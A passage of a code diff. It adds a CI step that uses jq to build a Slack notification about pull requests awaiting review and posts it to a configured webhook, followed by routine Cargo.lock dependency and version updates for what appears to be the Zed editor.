+ # Build Block Kit payload from JSON — no shell interpolation of PR titles.
+ # Why jq? PR titles are attacker-controllable input. By reading them
+ # through jq -r from the JSON file and passing the result to jq --arg,
+ # the content stays safely JSON-encoded in the final payload.
+ PRS=$(jq -r '.[] | "• <https://github.com/'"${REPO}"'/pull/\(.number)|#\(.number)> — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json)
+
+ jq -n \
+ --arg count "$COUNT" \
+ --arg prs "$PRS" \
+ '{
+ text: ($count + " PR(s) awaiting review for >72 hours"),
+ blocks: [
+ {
+ type: "section",
+ text: {
+ type: "mrkdwn",
+ text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*")
+ }
+ },
+ {
+ type: "section",
+ text: { type: "mrkdwn", text: $prs }
+ },
+ { type: "divider" },
+ {
+ type: "context",
+ elements: [{
+ type: "mrkdwn",
+ text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign."
+ }]
+ }
+ ]
+ }' | \
+ curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \
+ -H 'Content-Type: application/json' \
+ -d @-
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -228,9 +228,9 @@ dependencies = [
[[package]]
name = "agent-client-protocol"
-version = "0.9.4"
+version = "0.10.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475"
+checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2"
dependencies = [
"agent-client-protocol-schema",
"anyhow",
@@ -245,16 +245,16 @@ dependencies = [
[[package]]
name = "agent-client-protocol-schema"
-version = "0.10.8"
+version = "0.11.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1"
+checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789"
dependencies = [
"anyhow",
"derive_more",
"schemars",
"serde",
"serde_json",
- "strum 0.27.2",
+ "strum 0.28.0",
]
[[package]]
@@ -272,6 +272,7 @@ dependencies = [
"collections",
"credentials_provider",
"env_logger 0.11.8",
+ "feature_flags",
"fs",
"futures 0.3.31",
"google_ai",
@@ -334,7 +335,6 @@ dependencies = [
"agent_settings",
"ai_onboarding",
"anyhow",
- "arrayvec",
"assistant_slash_command",
"assistant_slash_commands",
"assistant_text_thread",
@@ -363,6 +363,7 @@ dependencies = [
"git",
"gpui",
"gpui_tokio",
+ "heapless",
"html_to_markdown",
"http_client",
"image",
@@ -662,7 +663,6 @@ dependencies = [
"schemars",
"serde",
"serde_json",
- "settings",
"strum 0.27.2",
"thiserror 2.0.17",
]
@@ -734,9 +734,6 @@ name = "arrayvec"
version = "0.7.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50"
-dependencies = [
- "serde",
-]
[[package]]
name = "as-raw-xcb-connection"
@@ -1282,7 +1279,6 @@ name = "audio"
version = "0.1.0"
dependencies = [
"anyhow",
- "async-tar",
"collections",
"cpal",
"crossbeam",
@@ -1294,7 +1290,6 @@ dependencies = [
"rodio",
"serde",
"settings",
- "smol",
"thiserror 2.0.17",
"util",
]
@@ -2074,7 +2069,16 @@ version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3"
dependencies = [
- "bit-vec",
+ "bit-vec 0.8.0",
+]
+
+[[package]]
+name = "bit-set"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd"
+dependencies = [
+ "bit-vec 0.9.1",
]
[[package]]
@@ -2083,6 +2087,12 @@ version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7"
+[[package]]
+name = "bit-vec"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51"
+
[[package]]
name = "bit_field"
version = "0.10.3"
@@ -2194,7 +2204,7 @@ version = "3.8.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365"
dependencies = [
- "darling",
+ "darling 0.21.3",
"ident_case",
"prettyplease",
"proc-macro2",
@@ -2460,7 +2470,7 @@ version = "0.25.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201"
dependencies = [
- "darling",
+ "darling 0.20.11",
"proc-macro2",
"quote",
"syn 2.0.117",
@@ -3164,17 +3174,6 @@ dependencies = [
"objc",
]
-[[package]]
-name = "codespan-reporting"
-version = "0.12.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81"
-dependencies = [
- "serde",
- "termcolor",
- "unicode-width",
-]
-
[[package]]
name = "codespan-reporting"
version = "0.13.0"
@@ -3320,6 +3319,7 @@ dependencies = [
"futures 0.3.31",
"fuzzy",
"gpui",
+ "livekit_client",
"log",
"menu",
"notifications",
@@ -3339,6 +3339,7 @@ dependencies = [
"ui",
"util",
"workspace",
+ "zed_actions",
]
[[package]]
@@ -3570,6 +3571,7 @@ version = "0.1.0"
dependencies = [
"anyhow",
"async-trait",
+ "base64 0.22.1",
"collections",
"futures 0.3.31",
"gpui",
@@ -3578,14 +3580,17 @@ dependencies = [
"net",
"parking_lot",
"postage",
+ "rand 0.9.2",
"schemars",
"serde",
"serde_json",
"settings",
+ "sha2",
"slotmap",
"smol",
"tempfile",
"terminal",
+ "tiny_http",
"url",
"util",
]
@@ -4397,7 +4402,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e"
dependencies = [
"cc",
- "codespan-reporting 0.13.0",
+ "codespan-reporting",
"indexmap",
"proc-macro2",
"quote",
@@ -4412,7 +4417,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a"
dependencies = [
"clap",
- "codespan-reporting 0.13.0",
+ "codespan-reporting",
"indexmap",
"proc-macro2",
"quote",
@@ -4514,8 +4519,18 @@ version = "0.20.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee"
dependencies = [
- "darling_core",
- "darling_macro",
+ "darling_core 0.20.11",
+ "darling_macro 0.20.11",
+]
+
+[[package]]
+name = "darling"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0"
+dependencies = [
+ "darling_core 0.21.3",
+ "darling_macro 0.21.3",
]
[[package]]
@@ -4532,13 +4547,38 @@ dependencies = [
"syn 2.0.117",
]
+[[package]]
+name = "darling_core"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4"
+dependencies = [
+ "fnv",
+ "ident_case",
+ "proc-macro2",
+ "quote",
+ "strsim",
+ "syn 2.0.117",
+]
+
[[package]]
name = "darling_macro"
version = "0.20.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead"
dependencies = [
- "darling_core",
+ "darling_core 0.20.11",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling_macro"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81"
+dependencies = [
+ "darling_core 0.21.3",
"quote",
"syn 2.0.117",
]
@@ -4582,6 +4622,7 @@ dependencies = [
"anyhow",
"gpui",
"indoc",
+ "inventory",
"log",
"paths",
"release_channel",
@@ -4590,6 +4631,7 @@ dependencies = [
"sqlez_macros",
"tempfile",
"util",
+ "uuid",
"zed_env_vars",
]
@@ -4809,11 +4851,11 @@ dependencies = [
[[package]]
name = "derive_setters"
-version = "0.1.8"
+version = "0.1.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9"
+checksum = "b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9"
dependencies = [
- "darling",
+ "darling 0.21.3",
"proc-macro2",
"quote",
"syn 2.0.117",
@@ -5196,7 +5238,6 @@ version = "0.1.0"
dependencies = [
"ai_onboarding",
"anyhow",
- "arrayvec",
"brotli",
"buffer_diff",
"client",
@@ -5214,6 +5255,7 @@ dependencies = [
"fs",
"futures 0.3.31",
"gpui",
+ "heapless",
"indoc",
"itertools 0.14.0",
"language",
@@ -5263,6 +5305,7 @@ dependencies = [
"client",
"cloud_llm_client",
"collections",
+ "db",
"debug_adapter_extension",
"dirs 4.0.0",
"edit_prediction",
@@ -6143,7 +6186,18 @@ version = "0.16.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f"
dependencies = [
- "bit-set",
+ "bit-set 0.8.0",
+ "regex-automata",
+ "regex-syntax",
+]
+
+[[package]]
+name = "fancy-regex"
+version = "0.17.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8"
+dependencies = [
+ "bit-set 0.8.0",
"regex-automata",
"regex-syntax",
]
@@ -6213,7 +6267,6 @@ dependencies = [
name = "feature_flags"
version = "0.1.0"
dependencies = [
- "futures 0.3.31",
"gpui",
]
@@ -6244,6 +6297,8 @@ name = "file_finder"
version = "0.1.0"
dependencies = [
"anyhow",
+ "channel",
+ "client",
"collections",
"ctor",
"editor",
@@ -6257,10 +6312,10 @@ dependencies = [
"pretty_assertions",
"project",
"project_panel",
+ "remote_connection",
"serde",
"serde_json",
"settings",
- "text",
"theme",
"ui",
"util",
@@ -6547,6 +6602,7 @@ dependencies = [
"async-trait",
"cocoa 0.26.0",
"collections",
+ "dunce",
"fs",
"futures 0.3.31",
"git",
@@ -7142,7 +7198,7 @@ dependencies = [
[[package]]
name = "gh-workflow"
version = "0.8.0"
-source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac"
+source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f"
dependencies = [
"async-trait",
"derive_more",
@@ -7153,13 +7209,13 @@ dependencies = [
"serde",
"serde_json",
"serde_yaml",
- "strum_macros",
+ "strum_macros 0.27.2",
]
[[package]]
name = "gh-workflow-macros"
version = "0.8.0"
-source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac"
+source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f"
dependencies = [
"heck 0.5.0",
"quote",
@@ -7319,6 +7375,7 @@ dependencies = [
"db",
"editor",
"feature_flags",
+ "file_icons",
"futures 0.3.31",
"fuzzy",
"git",
@@ -7455,9 +7512,9 @@ dependencies = [
[[package]]
name = "glow"
-version = "0.16.0"
+version = "0.17.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08"
+checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5"
dependencies = [
"js-sys",
"slotmap",
@@ -7483,6 +7540,7 @@ dependencies = [
"indoc",
"language",
"menu",
+ "multi_buffer",
"project",
"rope",
"serde",
@@ -7609,7 +7667,7 @@ dependencies = [
"mach2 0.5.0",
"media",
"metal",
- "naga 28.0.0",
+ "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
"num_cpus",
"objc",
"objc2",
@@ -7969,6 +8027,15 @@ dependencies = [
"smallvec",
]
+[[package]]
+name = "hash32"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606"
+dependencies = [
+ "byteorder",
+]
+
[[package]]
name = "hashbrown"
version = "0.12.3"
@@ -8053,6 +8120,16 @@ dependencies = [
"http 0.2.12",
]
+[[package]]
+name = "heapless"
+version = "0.9.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed"
+dependencies = [
+ "hash32",
+ "stable_deref_trait",
+]
+
[[package]]
name = "heck"
version = "0.3.3"
@@ -9114,7 +9191,7 @@ dependencies = [
"bytecount",
"data-encoding",
"email_address",
- "fancy-regex",
+ "fancy-regex 0.16.2",
"fraction",
"getrandom 0.3.4",
"idna",
@@ -9408,7 +9485,6 @@ dependencies = [
"aws_http_client",
"base64 0.22.1",
"bedrock",
- "chrono",
"client",
"cloud_api_types",
"cloud_llm_client",
@@ -9437,6 +9513,7 @@ dependencies = [
"ollama",
"open_ai",
"open_router",
+ "opencode",
"partial-json-fixer",
"pretty_assertions",
"release_channel",
@@ -9722,7 +9799,7 @@ dependencies = [
[[package]]
name = "libwebrtc"
version = "0.3.26"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"cxx",
"glib",
@@ -9820,7 +9897,7 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092"
[[package]]
name = "livekit"
version = "0.7.32"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"base64 0.22.1",
"bmrng",
@@ -9846,7 +9923,7 @@ dependencies = [
[[package]]
name = "livekit-api"
version = "0.4.14"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"base64 0.21.7",
"futures-util",
@@ -9873,7 +9950,7 @@ dependencies = [
[[package]]
name = "livekit-protocol"
version = "0.7.1"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"futures-util",
"livekit-runtime",
@@ -9889,7 +9966,7 @@ dependencies = [
[[package]]
name = "livekit-runtime"
version = "0.4.0"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"tokio",
"tokio-stream",
@@ -9944,8 +10021,10 @@ dependencies = [
"settings",
"simplelog",
"smallvec",
+ "tokio",
"ui",
"util",
+ "webrtc-sys",
"zed-scap",
]
@@ -10199,7 +10278,6 @@ dependencies = [
"async-recursion",
"collections",
"editor",
- "fs",
"gpui",
"html5ever 0.27.0",
"language",
@@ -10211,6 +10289,7 @@ dependencies = [
"pretty_assertions",
"pulldown-cmark 0.13.0",
"settings",
+ "stacksafe",
"theme",
"ui",
"urlencoding",
@@ -10710,16 +10789,16 @@ checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a"
[[package]]
name = "naga"
-version = "28.0.0"
+version = "29.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135"
+checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8"
dependencies = [
"arrayvec",
- "bit-set",
+ "bit-set 0.9.1",
"bitflags 2.10.0",
"cfg-if",
"cfg_aliases 0.2.1",
- "codespan-reporting 0.12.0",
+ "codespan-reporting",
"half",
"hashbrown 0.16.1",
"hexf-parse",
@@ -10735,15 +10814,15 @@ dependencies = [
[[package]]
name = "naga"
-version = "28.0.1"
-source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4"
+version = "29.0.0"
+source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575"
dependencies = [
"arrayvec",
- "bit-set",
+ "bit-set 0.9.1",
"bitflags 2.10.0",
"cfg-if",
"cfg_aliases 0.2.1",
- "codespan-reporting 0.12.0",
+ "codespan-reporting",
"half",
"hashbrown 0.16.1",
"hexf-parse",
@@ -11273,9 +11352,9 @@ dependencies = [
[[package]]
name = "objc2-audio-toolbox"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07"
+checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08"
dependencies = [
"bitflags 2.10.0",
"libc",
@@ -11288,9 +11367,9 @@ dependencies = [
[[package]]
name = "objc2-avf-audio"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910"
+checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be"
dependencies = [
"objc2",
"objc2-foundation",
@@ -11298,9 +11377,9 @@ dependencies = [
[[package]]
name = "objc2-core-audio"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82"
+checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2"
dependencies = [
"dispatch2",
"objc2",
@@ -11340,9 +11419,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33"
[[package]]
name = "objc2-foundation"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c"
+checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272"
dependencies = [
"bitflags 2.10.0",
"block2",
@@ -11363,9 +11442,9 @@ dependencies = [
[[package]]
name = "objc2-metal"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874"
+checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794"
dependencies = [
"bitflags 2.10.0",
"block2",
@@ -11375,6 +11454,19 @@ dependencies = [
"objc2-foundation",
]
+[[package]]
+name = "objc2-quartz-core"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f"
+dependencies = [
+ "bitflags 2.10.0",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-foundation",
+ "objc2-metal",
+]
+
[[package]]
name = "objc_exception"
version = "0.1.2"
@@ -11573,6 +11665,20 @@ dependencies = [
"thiserror 2.0.17",
]
+[[package]]
+name = "opencode"
+version = "0.1.0"
+dependencies = [
+ "anyhow",
+ "futures 0.3.31",
+ "google_ai",
+ "http_client",
+ "schemars",
+ "serde",
+ "serde_json",
+ "strum 0.27.2",
+]
+
[[package]]
name = "opener"
version = "0.7.2"
@@ -12082,7 +12188,7 @@ dependencies = [
[[package]]
name = "pet"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"clap",
"env_logger 0.10.2",
@@ -12113,14 +12219,18 @@ dependencies = [
"pet-virtualenvwrapper",
"pet-windows-registry",
"pet-windows-store",
+ "pet-winpython",
"serde",
"serde_json",
+ "tracing",
+ "tracing-subscriber",
+ "winresource",
]
[[package]]
name = "pet-conda"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12130,6 +12240,7 @@ dependencies = [
"pet-fs",
"pet-python-utils",
"pet-reporter",
+ "rayon",
"regex",
"serde",
"serde_json",
@@ -12139,7 +12250,7 @@ dependencies = [
[[package]]
name = "pet-core"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"clap",
"lazy_static",
@@ -12154,7 +12265,7 @@ dependencies = [
[[package]]
name = "pet-env-var-path"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12170,8 +12281,9 @@ dependencies = [
[[package]]
name = "pet-fs"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
+ "glob",
"log",
"msvc_spectre_libs",
"windows-sys 0.59.0",
@@ -12180,7 +12292,7 @@ dependencies = [
[[package]]
name = "pet-global-virtualenvs"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12193,7 +12305,7 @@ dependencies = [
[[package]]
name = "pet-homebrew"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12203,6 +12315,7 @@ dependencies = [
"pet-fs",
"pet-python-utils",
"pet-virtualenv",
+ "rayon",
"regex",
"serde",
"serde_json",
@@ -12211,7 +12324,7 @@ dependencies = [
[[package]]
name = "pet-jsonrpc"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"log",
@@ -12224,7 +12337,7 @@ dependencies = [
[[package]]
name = "pet-linux-global-python"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12237,7 +12350,7 @@ dependencies = [
[[package]]
name = "pet-mac-commandlinetools"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12250,7 +12363,7 @@ dependencies = [
[[package]]
name = "pet-mac-python-org"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12263,7 +12376,7 @@ dependencies = [
[[package]]
name = "pet-mac-xcode"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12276,20 +12389,22 @@ dependencies = [
[[package]]
name = "pet-pipenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
+ "lazy_static",
"log",
"msvc_spectre_libs",
"pet-core",
"pet-fs",
"pet-python-utils",
"pet-virtualenv",
+ "regex",
]
[[package]]
name = "pet-pixi"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12301,7 +12416,7 @@ dependencies = [
[[package]]
name = "pet-poetry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"base64 0.22.1",
"lazy_static",
